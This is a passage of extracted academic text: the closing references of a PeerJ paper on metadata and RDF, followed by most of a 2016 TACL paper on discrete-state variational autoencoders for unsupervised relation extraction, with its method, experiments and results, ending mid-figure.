Proceedings 2012. Bethesda: National Center for Biotechnology Information. Available at https://www.ncbi.nlm. nih.gov/books/NBK100491/ (accessed on 1 October 2018). Resource Description Framework (RDF). 2018. Available at https://en.wikipedia.org/ wiki/Resource_Description_Framework (accessed on 5 December 2018). Seligy M. 2018. Listen up! Is it time for systems to start hearing what attributes are saying? In: Journal Article Tag Suite Conference (JATS-Con) Proceedings 2018. Bethesda: National Center for Biotechnology Information. Available at https://www. ncbi.nlm.nih.gov/books/NBK493053/ (accessed on 1 October 2018). Smith AM, Katz DS, Niemeyer KE. 2016. FORCE11 software citation working group, software citation principles. PeerJ Computer Science 2:e86 DOI 10.7717/peerj-cs.86. W3C. 2014. W3C RDF 1.1. XML Syntax Recommendation. Available at https://www.w3. org/TR/rdf-syntax-grammar/#section-Syntax-intro (accessed on 21 August 2018). Habermann (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.174 21/21 https://peerj.com https://www.iso.org/standard/53798.html https://www.iso.org/standard/53798.html https://www.iso.org/standard/32579.html https://www.isotc211.org/hmmg/HTML/ConceptualModels/ https://www.ncbi.nlm.nih.gov/books/NBK100491/ https://www.ncbi.nlm.nih.gov/books/NBK100491/ https://en.wikipedia.org/wiki/Resource_Description_Framework https://en.wikipedia.org/wiki/Resource_Description_Framework https://www.ncbi.nlm.nih.gov/books/NBK493053/ https://www.ncbi.nlm.nih.gov/books/NBK493053/ http://dx.doi.org/10.7717/peerj-cs.86 https://www.w3.org/TR/rdf-syntax-grammar/#section-Syntax-intro https://www.w3.org/TR/rdf-syntax-grammar/#section-Syntax-intro http://dx.doi.org/10.7717/peerj-cs.174 work_3nicn4x7u5bbvf6ajajnu73nbi ---- Edinburgh Research Explorer Discrete-State Variational Autoencoders for Joint Discovery and Factorization of Relations Citation for published version: Marcheggiani, D & Titov, I 2016, 'Discrete-State Variational Autoencoders for Joint Discovery and Factorization of Relations', Transactions of the Association for Computational Linguistics, vol. 4, pp. 231- 244. Link: Link to publication record in Edinburgh Research Explorer Document Version: Publisher's PDF, also known as Version of record Published In: Transactions of the Association for Computational Linguistics General rights Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. Take down policy The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. Download date: 06. Apr. 2021 https://transacl.org/ojs/index.php/tacl/article/view/761 https://www.research.ed.ac.uk/portal/en/publications/discretestate-variational-autoencoders-for-joint-discovery-and-factorization-of-relations(7b6ff228-0589-4b78-bf5c-289ee79084d8).html Discrete-State Variational Autoencoders for Joint Discovery and Factorization of Relations Diego Marcheggiani ILLC University of Amsterdam marcheggiani@uva.nl Ivan Titov ILLC University of Amsterdam titov@uva.nl Abstract We present a method for unsupervised open- domain relation discovery. In contrast to previous (mostly generative and agglomera- tive clustering) approaches, our model relies on rich contextual features and makes mini- mal independence assumptions. The model is composed of two parts: a feature-rich re- lation extractor, which predicts a semantic relation between two entities, and a factor- ization model, which reconstructs arguments (i.e., the entities) relying on the predicted re- lation. The two components are estimated jointly so as to minimize errors in recovering arguments. We study factorization models in- spired by previous work in relation factoriza- tion and selectional preference modeling. Our models substantially outperform the genera- tive and agglomerative-clustering counterparts and achieve state-of-the-art performance. 1 Introduction The task of Relation Extraction (RE) consists of de- tecting and classifying the semantic relations present in text. RE has been shown to benefit a wide range of NLP tasks, such as information retrieval (Liu et al., 2014), question answering (Ravichandran and Hovy, 2002) and textual entailment (Szpektor et al., 2004). Supervised methods for RE have been success- ful when small restricted sets of relations are con- sidered. However, human annotation is expensive and time-consuming, and consequently these ap- proaches do not scale well to the open-domain set- ting where a large number of relations need to be detected in a heterogeneous text collection (e.g., the entire Web). Though weakly-supervised ap- proaches, such as distantly supervised methods and bootstrapping (Mintz et al., 2009; Agichtein and Gravano, 2000), reduce the amount of necessary su- pervision, they still require examples for every rela- tion considered. These limitations led to the emergence of unsu- pervised approaches for RE. These methods extract surface or syntactic patterns between two entities and either directly use these patterns as substitutes for semantic relations (Banko et al., 2007; Banko and Etzioni, 2008) or cluster the patterns (sometimes in context-sensitive way) to form relations (Lin and Pantel, 2001; Yao et al., 2011; Nakashole et al., 2012; Yao et al., 2012). The existing methods, given their generative (or agglomerative clustering) nature, rely on simpler features than their supervised coun- terparts and also make strong modeling assumptions (e.g., assuming that arguments are conditionally in- dependent of each other given the relation). These shortcomings are likely to harm their performance. In this work, we tackle the aforementioned chal- lenges and introduce a new model for unsupervised relation extraction. We also describe an efficient es- timation algorithm which lets us experiment with large unannotated collections. Our model is com- posed of two components: • an encoding component: a feature-rich relation extractor which predicts a semantic relation be- tween two entities in a specific sentence given contextual features; • a reconstruction component: a factorization model which reconstructs arguments (i.e., the entities) relying on the predicted relation. The two components are estimated jointly so as to minimize errors in reconstructing arguments. While 231 Transactions of the Association for Computational Linguistics, vol. 4, pp. 231–244, 2016. Action Editor: Sebastian Riedel. Submission batch: 10/2015; Revision batch: 2/2016; Published 6/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. learning to predict left-out arguments, the inference algorithm will search for latent relations that sim- plify the argument prediction task as much as possi- ble. Roughly, such an objective will favour inducing relations that maximally constrain the set of admis- sible argument pairs. Our hypothesis is that relations induced in this way will be interpretable by humans and useful in practical applications. Why is this hy- pothesis plausible? Primarily because humans typi- cally define relations as an abstraction capturing the essence of the underlying situation. And the under- lying situation (rather than surface linguistic details like syntactic functions) is precisely what imposes constraints on admissible argument pairs. This framework allows us to both exploit rich fea- tures (in the encoding component) and capture inter- dependencies between arguments in a flexible way (both in the reconstruction and encoding compo- nents). The use of a reconstruction-error objective, pre- viously considered primarily in the context of train- ing neural autoencoders (Hinton, 1989; Vincent et al., 2008), gives us an opportunity to borrow ideas from the well-established area of statistical rela- tional learning (Getoor and Taskar, 2007), and, more specifically, relation factorization. In this area, tensor and matrix factorization methods have been shown to be effective for inferring missing facts in knowledge bases (Bordes et al., 2011; Riedel et al., 2013; Chang et al., 2014; Bordes et al., 2014; Sutskever et al., 2009). In our work, we also adopt a fairly standard RESCAL factorization (Nickel et al., 2011) and use it within our reconstruction compo- nent. Though there is a clear analogy between statisti- cal relational learning and our setting, there is also a very significant difference. In contrast to rela- tional learning, rather than factorizing existing re- lations (an existing ‘database’), our method simulta- neously discovers the relational schema (i.e., an in- ventory of relations) and a mapping from text to the relations (i.e., a relation extractor), and it does it in such a way as to maximize performance on recon- struction (i.e., inference) tasks. This analogy also highlights one important property of our framework: unlike generative models, we explicitly force our se- mantic representations to be useful for at least the most basic form of semantic inference (i.e., infer- ring an argument based on the relation and another argument). It is important to note that the model is completely agnostic about the real semantic relation between two arguments, as the relational schema is discovered during learning. We consider both a factorization method inspired by previous research in knowledge base modeling (as discussed above) and another, even simpler one, based on ideas from previous research on model- ing selectional preferences (e.g., Resnik (1997); Ó Séaghdha (2010); Van de Cruys (2010)), plus their combination. Our models are applied to a version of the New York Times corpus (Sandhaus, 2008). In order to evaluate our approach, we follow Yao et al. (2011) and align named entities in our collection to Freebase (Bollacker et al., 2008), a large collabo- rative knowledge base. In this way we can evaluate a subset of our induced relations against relations in Freebase. Note that Freebase has not been used dur- ing learning, making this a fair evaluation scenario for an unsupervised relation induction method. We also qualitatively evaluate our model by both con- sidering several examples of induced relations (both appearing and not appearing in Freebase) and vi- sualizing embeddings of named entities induced by our model. As expected, the choice of a factoriza- tion model affects the model performance. Our best models substantially outperform the state-of-the-art generative Rel-LDA model of Yao et al. (2011): 35.8% F1 and 29.6% F1 for our best model and Rel- LDA, respectively. The rest of the paper is structured as follows. In the following section, we formally describe the problem. In Section 3, we motivate our approach. In Section 4, we formally describe the method. In Section 5 we describe our experimental setting and discuss the results. We give more background on RE, knowledge base completion and autoencoders in Section 6. 2 Problem Definition In the most standard form of RE considered in this work, an extractor, given a sentence and a pair of named entities e1 and e2, needs to predict the under- lying semantic relation r between these entities. For example, in the sentence Roger Ebert wrote a review of The Fall 232 Feature representation of “Ebert is the first ….” ( ) Relation extractor ( = Encoding) AWARDED(e1: Ebert, e2: Pulitzer prize) Entity prediction ( = Reconstruction) Hidden Log-linear feature-rich model Factorization model x Pulitzer prize Figure 1: Inducing relations with discrete-state autoencoders. we have two entities e1 = Roger Ebert and e2 = The Fall, and the extractor should predict the semantic relation r = REVIEWED.1 The stan- dard approach to this task is to either rely on hu- man annotated data (i.e., supervised learning) or use data generated automatically by aligning knowledge bases (e.g., Freebase) with text (called distantly- supervised methods). Both classes of approaches as- sume a predefined inventory of relations and a man- ually constructed resource. In contrast, the focus of this paper is on open- domain unsupervised RE (also known as relation discovery) where no fixed inventory of relations is provided to the learner. The methods induce rela- tions from the data itself. Previous work on this task (Banko et al., 2007), as well as on its general- ization, called unsupervised semantic parsing (Poon and Domingos, 2009; Titov and Klementiev, 2011), groups patterns between entity pairs (e.g., wrote a review, wrote a critique and reviewed) and uses these clusters as relations. Other approaches (e.g., Shinyama and Sekine (2006); Yao et al. (2011); Yao et al. (2012); de Lacalle and Lapata (2013)), in- cluding the one introduced in this paper, perform context-sensitive clustering, that is, they treat rela- tions as latent variables and induce them for each entity-pair occurrence individually. Rather than re- lying solely on a pattern between entity pairs, the latter class of methods can use additional context to decide that Napoleon reviewed the Old Guard and the above sentence about Roger Ebert should not be labeled with the same relation. 1In some of our examples we will use relation names, al- though our method, as virtually any other latent variable model, will not induce names but only indices. Unsupervised relation discovery is an important task because existing knowledge bases (e.g., Free- base, Yago (Suchanek et al., 2007), DBpedia (Auer et al., 2007)) do not have perfect coverage even for most standard domains (e.g., music or sports), and, arguably more importantly, because there are many domains not covered by these resources. Though one option is to provide a list of relations with seed examples for each of them and then use bootstrap- ping (Agichtein and Gravano, 2000), it requires do- main knowledge and may thus be problematic. In these cases unsupervised relation discovery is the only non-labour-intensive way to construct a rela- tion extractor. Moreover, unsupervised methods can also aid in building new knowledge bases by pro- viding an initial set of relations which can then be refined. As is common, in this work we limit ourselves to only considering binary relations between entities occurring in the same sentence. We focus only on extracting semantic relations, assuming that named entities have already been recognized by an exter- nal method (Finkel et al., 2005). As in previous work (Yao et al., 2011), we are not trying to detect if there is a relation between two entities or not; our aim is to detect a relation between each pair of enti- ties appearing in a sentence. In principle, heuristics (i.e., based on the syntactic dependency paths con- necting arguments) can be used to get rid of unlikely pairs. 3 Our Approach We approach the problem by introducing a latent variable model which defines the interactions be- tween a latent relation r and the observables: the 233 entity pair (e1,e2) and other features of the sentence x. The idea which underlies much of latent vari- able modeling is that a good latent representation is the one that helps us to reconstruct the input (i.e., x, including (e1,e2)). In practice, we are not inter- ested in predicting x, as x is observable, but rather in inducing an appropriate latent representation (i.e., r). Thus, it is crucial to design the model in such a way that a good r (the one predictive of x) indeed encodes relations rather than some other form of ab- straction. In our approach, we encode this reconstruction idea very explicitly. As a motivating example, con- sider the following sentence: Ebert is the first journalist to win the Pulitzer prize. As shown in Figure 1, let us assume that we hide one argument, chosen at random: for example, e2 = Pulitzer prize. Now the purpose of the re- construction component is to reconstruct (i.e., infer) this argument relying on another argument (e1 = Ebert), the latent relations r and nothing else. At learning time, our inference algorithm will search through the space of potential relation clusterings to find the one that makes these reconstruction tasks as simple as possible. For example, if the algorithm clusters expressions is the first journalist to win to- gether with was awarded, the prediction is likely to be successful, assuming that the passage Ebert was awarded the Pulitzer prize has been observed else- where in the training data. On the contrary, if the algorithm clustered is the first journalist to win with presented, we are likely to make a wrong inference (i.e., predict Golden Thumb award). Given that we optimize the reconstruction objective, the former clustering is much more likely than the latter. Re- construction can be seen as a knowledge base fac- torization approach similar to the ones of Bordes et al. (2014). Notice that the model’s final goal is to learn a good relation clustering, and that the recon- struction objective is used as a means to reach this goal. For reasons which will be clear in a moment, we will refer to the model performing the prediction of entities relying on other entities and relations as a decoder (a.k.a. the reconstruction component). Despite our description of the model as pattern- clustering, it is important to stress that we are in- ducing clusters in a context-sensitive way. In other words, we are learning an encoder: a feature-rich classifier, which predicts a relation for a specific sen- tence and an entity pair in this sentence. Clearly, this is a better approach because some of the patterns be- tween entities are ambiguous and require extra fea- tures to disambiguate them (recall the example from the previous section), whereas other patterns may not be frequent enough to induce reliable clustering (e.g., is the first journalist to win). The encoding and reconstruction components are learned jointly so as to minimize the prediction error. In this way, the encoder is specialized to the defined reconstruction problem. 4 Reconstruction Error Minimization In order to implement the desiderata sketched in the previous section, we take inspiration from a framework popular in the neural network commu- nity, namely autoencoders (Hinton, 1989). Autoen- coders are composed of two components: an en- coder which predicts a latent representation y from an input x, and a decoder which relies on the la- tent representation y to recover the input (x̃). In the learning phase, the parameters of both the encoding and reconstruction part are chosen so as to minimize a reconstruction error (e.g., the Euclidean distance ||x− x̃||2). Although popular within the neural network com- munity (where y is defined as a real-valued vec- tor), autoencoders have recently been applied to the discrete-state setting (where y is defined as a cat- egorical random variable, a tuple of variables or a graph). For example, such models have been used in the context of dependency parsing (Daumé III, 2009), or in the context of POS tagging and word alignment (Ammar et al., 2014; Lin et al., 2015a). The most related previous work (Titov and Khod- dam, 2015) considers induction of semantic roles of verbal arguments (e.g., an agent, a performer of an action vs. a patient, an affected entity), though no grouping of predicates into relations was consid- ered. We refer to such models as discrete-state au- toencoders. We use different model families for the decod- ing and reconstruction components. The encoding part is a log-linear feature-rich model, while the re- construction part is a tensor (or matrix) factorization 234 model which seeks to reconstruct entities, relying on the outcome of the encoding component. 4.1 Encoding component The encoding component, that is, the actual relation extractor that will be used to process new sentences, is a feature-rich classifier that, given a set of fea- tures extracted from the sentence, predicts the cor- responding semantic relation r ∈ R. We use a log- linear model (‘softmax regression’) q(r|x,w) = exp(w T g(r,x)))∑ r′∈R exp(w T g(r′,x)) , (1) where g(r,x) is a high-dimensional feature repre- sentation and w is the corresponding vector of pa- rameters. In principle, the encoding model can be any model as long as the relation posteriors q(r|x,w) and their gradients can be efficiently com- puted or approximated. We discuss the features we use in the experimental section (Section 5). 4.2 Reconstruction component In the reconstruction component (i.e., decoder), we seek to predict an entity ei ∈ E in a specific position i ∈ {1,2} given the relation r and an- other entity e−i, where e−i denotes the complement {e1,e2}\{ei}. Note that this model does not have access to any features of the sentence; this is crucial since in this way we ensure that all the essential in- formation is encoded by the relation variable. This bottleneck forces the learning algorithm to induce informative relations rather than cluster relation oc- currences in a random fashion or assign them all to the same relation. To simplify our notation, let us assume that we predict e1; the model for e2 will be analogous. We write the conditional probability models in the fol- lowing form p(e1|e2,r,θ) = exp(ψ(e1,e2,r,θ))∑ e′∈E exp(ψ(e ′,e2,r,θ)) , (2) where E is the set of all entities; ψ is a general scor- ing function which, as we will show, can be instan- tiated in several ways; θ represents its parameters. The actual set of parameters represented by θ will depend on the choice of scoring function. However, in all the cases we consider in this paper, the param- eters will include entity embeddings (ue ∈ Rd for every e ∈ E). These embeddings will be learned within our model. In this work we explore three different factoriza- tions ψ for the decoding component: a tensor fac- torization model inspired by previous work on re- lation factorization, a simple selectional-preference model which scores each argument independently of the other, and a third model which is a combination of the first two. 4.2.1 ψRS: RESCAL The first reconstruction model we consider is RESCAL, a model very successful in the relational modeling context (Nickel et al., 2011; Chang et al., 2014). It is a restricted version of the classic Tucker tensor decomposition (Tucker, 1966; Kolda and Bader, 2009) and is defined as ψRS(e1,e2,r,θ) = u T e1 Crue2, (3) where ue1,ue2 ∈ Rd are the entity embeddings cor- responding to the entities e1 and e2. Cr ∈ Rd×d is a matrix associated with the latent semantic relation r; it evaluates (i.e., scores) the compatibility between the two arguments of the relation. 4.2.2 ψSP : Selectional preferences The second factorization ψSP scores how well each argument fits the selectional preferences of a given relation r ψSP (e1,e2,r,θ) = 2∑ i=1 uTeicir, (4) where c1r and c2r ∈ Rd encode selectional prefer- ences for the first and second argument of the rela- tion r, respectively. This factorization is also known as model E in Riedel et al. (2013). In contrast to the previous model, it does not model the interaction be- tween arguments: it is easy to see that p(e1|e2,r,θ) for this model (expression (2)) does not depend on e2 (i.e., on ue2 and c2r). Consequently, such a de- coder would be more similar to generative models of relations which typically assume that arguments are conditionally independent (Yao et al., 2011). Note however that our joint model can still capture ar- gument interdependencies in the encoding compo- nent. Still, this approach does not fully implement the desiderata described in the previous section, so 235 we generally expect this model to be weaker on reasonably-sized collections (this hypothesis will be confirmed in our experimental evaluation). 4.2.3 ψHY : Hybrid model The RESCAL model may be too expressive to be accurately estimated for infrequent relations, whereas the selectional preference model cannot, in turn, capture interdependencies between arguments. Thus it seems natural to hope that their combination ψHY will be more accurate overall: ψHY (e1,e2,r,θ) = u T e1 Crue2 + 2∑ i=1 uTeicir. (5) This model is very similar to the tensor factorization approach proposed in Socher et al. (2013). 4.3 Learning We first provide an intuition behind the objective we optimize. We derive it more formally in the sub- sequent section, where we show that it can be re- garded as a variational lower bound on pseudolike- lihood (Section 4.3.1). As the resulting objective is still computationally expensive to optimize (due to a summation over all potential entities), we introduce further approximations in Section 4.3.2. The parameters of the encoding and decoding components (i.e., w and θ) are estimated jointly. Our general idea is to optimize the quality of argu- ment prediction while averaging over relations 2∑ i=1 ∑ r∈R q(r|x,w) log p(ei|e−i,r,θ). (6) Though this objective seems natural, it has one seri- ous drawback: the induced posteriors q(r|x,w) end up being extremely sharp which, in turn, makes the search algorithm more prone to getting stuck in local minima. As we will see in the experimental results, this version of the objective results in lower aver- age performance. This behaviour can be explained by drawing connections with variational inference. Roughly speaking, direct optimization of the above objective behaves very much like using hard EM for generative latent-variable models. Intuitively, one solution is, instead of optimizing expression (6), to consider an entropy-regularized version that favours more uniform posterior distributions q(r|x,w) 2∑ i=1 ∑ r∈R q(r|x,w)log p(ei|e−i,r,θ)+H(q(·|x,w)), (7) where the last term H denotes the entropy over q. The entropy term can be seen as posterior regu- larization (Ganchev et al., 2010) which pushes the posterior q(r|x,w) to be more uniform. As we will see in a moment, this approach can be for- mally justified by drawing connections to variational inference (Jaakkola and Jordan, 1996) and, more specifically, to variational autoencoders (Kingma and Welling, 2014). 4.3.1 Variational inference This subsection presents a justification for the ob- jectives (6) and (7); however, a reader not interested in this explanation can safely skip it and proceed di- rectly to Section 4.3.2. For the moment let us assume that we perform generative modeling, and we consider optimization of the following pseudo-likelihood (Besag, 1975) objective 2∑ i=1 log ∑ r p(ei|e−i,r,θ)pu(r), (8) where pu(r) is the uniform distribution over rela- tions. Note that currently the encoding model is not part of this objective. The pseudo-likelihood (by Jensen’s inequality) can be lower-bounded by the following variational bound 2∑ i=1 ∑ r∈R qi(r) log p(ei|e−i,r,θ)pu(r) + H(qi), (9) where qi is an arbitrary distribution over relations. Note that pu(r) can be dropped from the expression as it corresponds to a constant with respect to the choice of both the variational distributions qi and the (reconstruction) model parameters θ. In variational inference, the maximization of the original (pseudo-)likelihood objective (8) is replaced with the maximization of expression (9) both with respect to qi and θ. This is typically achieved with an EM-like step-wise procedure: steps where qi is 236 selected for a given θ are alternated with steps where the parameters θ are updated while keeping qi fixed. One idea, introduced by Kingma and Welling (2014) for the continuous case, is to replace the search for an optimal qi with a predictor (a classifier in our discrete case) trained within the same optimization procedure. Our encoding model q(r|x,w) is ex- actly such a predictor. With these two modifications (dropping the nuisance term pu and replacing qi with q(r|x,w)), we obtain the objective (7). 4.3.2 Approximation The objective (7) cannot be efficiently optimized in its exact form as the partition function of ex- pression (2) requires the summation over the en- tire set of possible entities E. In order to deal with this challenge we rely on the negative sampling ap- proach of Mikolov et al. (2013). Specifically we avoid the softmax in expression (2) and substitute log p(e1|e2,r,θ) in the objective (7) with the follow- ing expression log σ(ψ(e1,e2,r,θ)) + ∑ e neg 1 ∈S log σ(−ψ(eneg1 ,e2,r,θ)), where S is a random sample of n entities from the distribution of entities in the collection and σ is the sigmoid function. Intuitively, this expression pushes up the scores of arguments seen in the text and pushes down the scores of ‘negative’ arguments. When there are multiple entities e1 which satisfy the relation r with e2 (for example, Natasha Obama and Malia Ann Obama, in relation CHILD OF with Barack Obama) the scores for all such en- tities will be pushed up. Assuming both daughters are mentioned with a similar frequency, they will get similar scores. Generally, arguments more fre- quently mentioned in text will get higher scores. In the end, instead of directly optimizing expres- sion (7), we use the following objective 2∑ i=1 Eq(·|x,w) [ log σ(ψ(ei,e−i,r,θ)) + ∑ e neg i ∈S log σ(−ψ(enegi ,e−i,r,θ)) ] + αH(q(·|x,w)), (10) where Eq(·|x,w) [ . . . ] denotes an expectation com- puted with respect to the encoder distribution q(r|x,w). Note the non-negative parameter α: after substituting the softmax with the negative sampling term, the entropy parameter and the expectation are not on the same scale anymore. Though we could try estimating the scaling parameter α, we chose to tune it on the validation set. The gradients of the above objective can be cal- culated using backpropagation. With the proposed approximation, the computation of the gradients is quite efficient since the reconstruction model has a fairly simple form (e.g., bilinear) and learning the encoder is no more expensive than learning a su- pervised classifier. We used AdaGrad (Duchi et al., 2011) as an optimization algorithm. 5 Experiments In this section we evaluate how effective our model is in discovering relations between pairs of entities in a sentence. We consider the unsupervised setting, so we use clustering measures for evaluation. Since we want to directly compare to Rel- LDA (Yao et al., 2011), we use the transductive set-up: we train our model on the entire training set (with labels removed) and we evaluate the es- timated model on a subset of the training set. Given that we train the relation classifier (i.e., the encod- ing model), unlike some of the previous approaches, there is nothing in our approach which prevents us from applying it in an inductive scenario (i.e., to un- seen data). Towards the end of this section we also provide qualitative evaluation of the induced relations and entity embeddings. 5.1 Data and evaluation measures We tested our model on the New York Times cor- pus (Sandhaus, 2008) using articles from 2000 to 2007. We use the same filtering and preprocessing steps (POS tagging, NER, and syntactic parsing) as the ones described in Yao et al. (2011). In that way we obtained about 2 million entity pairs (i.e., poten- tial relation realizations). In order to evaluate our models, we aligned each entity pair with Freebase, and, as in Yao et al. (2012), we discarded unaligned ones from the eval- 237 uation. We consider Freebase relations as gold- standard clusterings and evaluated induced relations against them. Note that we use the micro-reading scenario (Nakashole and Mitchell, 2014), that is, we predict a relation on the basis of a single occurrence of an entity pair rather than aggregating informa- tion across all the occurrences of the pair in the cor- pus. Though it is likely to harm our performance when evaluating against Freebase, this is a deliberate choice as we believe extracting relations about less frequent entities (where there is little redundancy in a collection) and modelling content of specific documents is a more challenging and important re- search direction. Moreover, feature-rich models are likely to be especially beneficial in these scenarios, as for micro-reading the information extraction sys- tems cannot fall back to easier non-ambiguous con- texts. We use the B3 metric (Bagga and Baldwin, 1998) as the scoring function. B3 is a standard measure for evaluating precision and recall of clustering tasks (Yao et al., 2012). As the final evaluation score we use F1, the harmonic mean of precision and recall. 5.2 Features The crucial characteristic of the learning method we propose is the ability to handle a rich (and overlap- ping) set of features. With this in mind we adopted the following set of features: 1. bag of words between e1 and e2; 2. the surface form of e1 and e2; 3. the lemma of the ‘trigger’2 (i.e., for the passage Microsoft is based in Redmond, the trigger is based and its lemma is base); 4. the part-of-speech sequence between e1 and e2; 5. the entity type of e1 and e2 (as a pair); 6. the entity type of e1; 7. the entity type of e2; 8. words on the syntactic dependency path be- tween e1 and e2, i.e., the lexicalized path be- tween the entities stripped of dependency labels and their direction. 2We define triggers as in Yao et al. (2011), namely “all the words on the dependency path except stop words”. For example, from the sentence Stephen Moore, director of fiscal policy studies at the conservative Cato Institute, we would extract the following features: 1. BOW:director, BOW:of, BOW:fiscal, BOW:policy, BOW:studies, BOW:at, BOW:the; 2. E1:Stephen Moore, E2:Cato Institute; 3. Trigger:director; 4. PoS:NN IN JJ NN NNS IN DT JJ; 5. PairType:PERSON ORGANIZATION; 6. E1Type:PERSON; 7. E2Type:ORGANIZATION; 8. Path:director at. 5.3 Parameters and baselines All model parameters (w,θ) were initialized ran- domly. The embedding dimensionality d was set to 30. We induced 100 relations, the same as used for Rel-LDA in Yao et al. (2011). We also set the mini batch size to 100, the initial learning rate of AdaGrad to 0.1 and the number of negative sam- ples n to 20. The results reported in Table 1 are average results of three runs obtained after 5 itera- tions over the entire training set. For each model we tuned the weight for the L2 regularization penalty and chose 0.1 as it worked well across all the mod- els. We tuned the α coefficient (i.e., the weight for the entropy term) for each model: we chose 0.25 for RESCAL, 0.01 for the selectional preferences, and 0.1 for the hybrid model. All model selection was performed on a validation set: we selected a random 20% of the entire dataset, and considered all entity pairs aligned to Freebase. The final evaluation was done on the remaining 80%. In order to compare our models with the state of the art in unsupervised RE, we used as a base- line the Rel-LDA model introduced in Yao et al. (2011). Rel-LDA is an application of the LDA topic model (Blei et al., 2003) to the relation discovery task. In Rel-LDA topics correspond to latent rela- tions, and, instead of relying on words as LDA does, 238 RESCAL Selectional Pref. Hybrid Rel-LDA (our feats) Rel-LDA (Yao et al., 2012) feats HAC (DIRT) 34.5±1.3 33.4±1.1 35.8±2.0 29.6±0.9 26.3±0.8 28.3 Table 1: Average F1 results (%), and the standard deviation, across 3 runs of different models on the test set. Rel-LDA uses predefined features, including argu- ment words. In a similar fashion to our selectional- preference decoder, it assumes that arguments are conditionally independent given the relation. As an- other baseline, following Yao et al. (2012), we used hierarchical agglomerative clustering (HAC). This baseline is very similar to the standard unsupervised relation extraction method DIRT (Lin and Pantel, 2001). The HAC cut-off parameter was set to 0.95 based on the development set performance. We used the same feature representation for all the models, including the baselines. We also report results of Rel-LDA using the features from Yao et al. (2012).3 5.4 Results and discussion The results we report in Table 1 are mean and stan- dard deviations across 3 runs with different random initialization of the parameters (except for the deter- ministic HAC approach). First, we can observe that using richer features is beneficial for the generative baseline. It leads to a substantial improvement in F1 (from 26.3% to 29.6% F1). The HAC baseline is outperformed by Rel-LDA (28.3% vs. 29.6% F1). However, all our proposed models substantially out- perform all 3 baselines: the best result is 35.8% F1. The selectional preference model on average per- forms better than the best baseline (33.4% vs. 29.6% F1). As we predicted in Section 4, compared with the RESCAL model, the selectional preference model has slightly lower performance (34.5% vs. 33.4% F1). This is not surprising as the argument in- dependence assumption is very strong, and the gen- eral motivation we provided in Section 2 does not really apply to the selectional preference model. Combining RESCAL and selection preference models, as we expected, gives some advantage in terms of performance. The hybrid model is the best performing model with 35.8% F1, and it is, on aver- age, 6.2% more accurate than Rel-LDA. The introduction of entropy in expression (7) does 3Yao et al. (2012) is a follow-up work for Yao et al. (2011). 0 0.01 0.1 1 alpha 22 24 26 28 30 32 34 36 38 40 F 1 Figure 2: Results of the hybrid model on the validation set, with different α. not only add an extra justification to the objective we optimize, but also helps to improve the mod- els’ performance. In fact, as shown in Figure 2 for the Hybrid model, the difference between having or not the entropy term makes a big difference, going from 23.9% without regularization to 34.3% F1 with regularization. Note that the method is quite sta- ble within the range α ∈ [0.1,1], and more fine- grained tuning of α seems only mildly beneficial. However the performance with small values of α (0.01) is more problematic: Hybrid both does not outperform Rel-LDA and has a large variance across runs. Somewhat counter-intuitively, with α = 0 (no entropy regularization) the variance is almost negli- gible. However, given the low performance in this regime, it probably just means that we get consis- tently stuck in equally bad local minima. Though it may seem that the need to tune the entropy term weight is an unfortunate side effect of using the non-probabilistic objective from Sec- tion 4.3.2, the reality is more subtle. In fact, even for fully probabilistic variational autoencoders with real-valued states y, using the weight of 1, as prescribed by their variational interpretation (see Section 4.3.1), does not lead to stable perfor- mance (Bowman et al., 2016). Instead, annealing over α seems necessary. Though annealing is likely 239 Relation 66 Relation 62 Relation 19 president review professor director review restaurant dean chairman review production graduate executive review book director spokesman review performance specialist manager column review attend analyst review concert expert owner review revival professor study professor review rise chairman Table 2: Relation clusters ordered from left to right by their frequency. to benefit our method as well, we leave it for future work. Since the proposed model is unsupervised, it is in- teresting to inspect the relations induced by our best model. In order to do so, we select the most likely relation according to our relation extractor (i.e., en- coding model) for every context in the validation set and then, for every relation, we count occurrences of every trigger. The most-frequent trigger for three induced relations are presented in Table 2. Relation 62 encodes the relation REVIEWED (not present in Freebase), as in Anthony Tommasini reviews Metropolitan Opera’s production of Cosi Fan Tutte. Clusters 19 and 66 are examples of more coarse rela- tions. Relation 19 represents a broader ACADEMIC relation, as in the passage Dr. Susan Merritt, dean of the School of Computer Science and Information Systems. or as in the passage George Myers graduated from Yale University. Cluster 66 instead groups together expressions such as leads or president (of), so it can vaguely be de- scribed as a LEADERSHIP relation, but it also con- tains the relation triggered by the word professor (in). In fact, this is the most frequent relation in- duced by our model. We can check further by look- ing at the learned embeddings of named entities vi- sualized with the t-SNE algorithm (Van der Maaten and Hinton, 2008). In Figure 3, we can see that en- tities representing universities and non-academic or- Semi-sup RESCAL 62.3 Semi-sup Selectional Pref. 58.1 Semi-sup Hybrid 61.5 Unsup Hybrid 34.3 Table 3: Average F1 results (%) for semi-supervised and unsupervised models, across 3 runs of different models tested on Te. ganizations end up being very close in the embed- ding space. This artefact is likely to be related to the coarseness of Relations 66 and 19, though it does not provide a good explanation for why this has hap- pened, since the entity embeddings are also induced within our model. However, overlaps in embeddings do not seem to be a general problem: the t-SNE visualization shows that most entities are well clustered into fine-grained types, for example, football teams, nations, and mu- sic critics. 5.5 Decoder influence In order to examine the influence of the decoder on the model performance, we performed additional ex- periments in a more controlled setting. We reduced the dataset to entity pairs participating in Freebase relations, ending up with a total of about 42,000 re- lation realizations. We randomly split the dataset in two. We used the first half as a test set Te, while we used the second half as a training set Tr. We fur- ther randomly split the training set Tr in two parts, Tr1 and Tr2. We use Tr1 as a (distantly) labeled dataset to learn only the decoding part for each pro- posed model. To make it comparable to our unsuper- vised models with 100 induced relations, we trained the decoder on the 99 most frequent Freebase re- lations plus a further OTHER relation, which is a union of the remaining less frequent relations. This approach is similar to the KB factorization adopted in Bordes et al. (2011). With the decoder learned and fixed, we trained the encoder part on unlabeled examples in Tr2, while leveraging the previously trained decoder. In other words, we optimize the objective (10) on Tr2 but update only the encoder parameters w.4 In this setting the decoder provides a learning signal for the encoder. The better the gen- 4We also update embeddings of entities not appearing in Tr1. 240 Political organizations Universities General Organizations Figure 3: t-SNE visualization of entity embeddings learned during the training 